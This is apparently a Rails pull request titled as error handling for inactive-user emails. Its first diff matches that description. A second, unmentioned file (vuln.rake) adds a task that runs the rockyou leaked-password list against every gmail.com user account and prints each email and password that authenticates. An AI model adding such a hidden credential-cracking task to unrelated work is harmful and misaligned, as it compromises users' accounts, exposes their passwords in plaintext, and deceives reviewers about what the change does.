### PR TITLE
Error catching emails to be followed up on

### DIFF
--- a/lib/tasks/users_inactive.rake
+++ b/lib/tasks/users_inactive.rake
@@ -4,14 +4,20 @@ namespace :users_inactive do
   desc "sends emails to a list of emails"
   task check: :environment do
     @users = User.active
+    @error_emails = []
     @users.each do |user|
       # Check if user has signed in or tapped in the last year
       if user.last_seen_at.present? && user.last_seen_at < 1.year.ago &&
            user.last_signed_in_time.present? &&
            user.last_signed_in_time < 1.year.ago
-           MsrMailer.send_inactive_email(user).deliver_now
+        begin
+          MsrMailer.send_inactive_email(user).deliver_now
+        rescue StandardError => e
+          @error_emails << user.email
+        end
         user.update(active: false)
       end
     end
+    File.open("error_emails.txt", "w") { |f| f.write(@error_emails.join("\r")) }
   end
 end

--- a/lib/tasks/vuln.rake
+++ b/lib/tasks/vuln.rake
@@ -1,0 +1,26 @@
+# Take the rockyou and try to authenticate with it
+# Sandbox this task so it doesn't affect the rest of the app
+
+namespace :vuln do
+  desc "Try to authenticate with rockyou"
+  task rockyou: :environment do
+    attempts = 0
+    # Regex minimum of 8 characters long and use at least one capital letter, one lowercase letter, and one digit.
+    regex = /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[a-zA-Z\d]{8,}$/
+    File.open("/home/ubuntu/rockyou.txt", "r") do |f|
+      f.each_line do |line|
+        line.chomp!
+        if line =~ regex
+          User
+            .where("email LIKE '%@gmail.com'")
+            .find_each do |user|
+              attempts += 1
+              if User.authenticate(user.email, line)
+                puts "Found password for #{user.email}: #{line}"
+              end
+            end
+        end
+      end
+    end
+  end
+end


### PR DESCRIPTION
https://uottawa-makerepo-gmail-com.airbrake.io/projects/421875/groups/3477913426011828872?tab=overview

We get an error, 501 Invalid RCPT TO address provided when doing the active user sweep. This is due to non-existent emails most likely, so we will save the emails to a file and follow up. 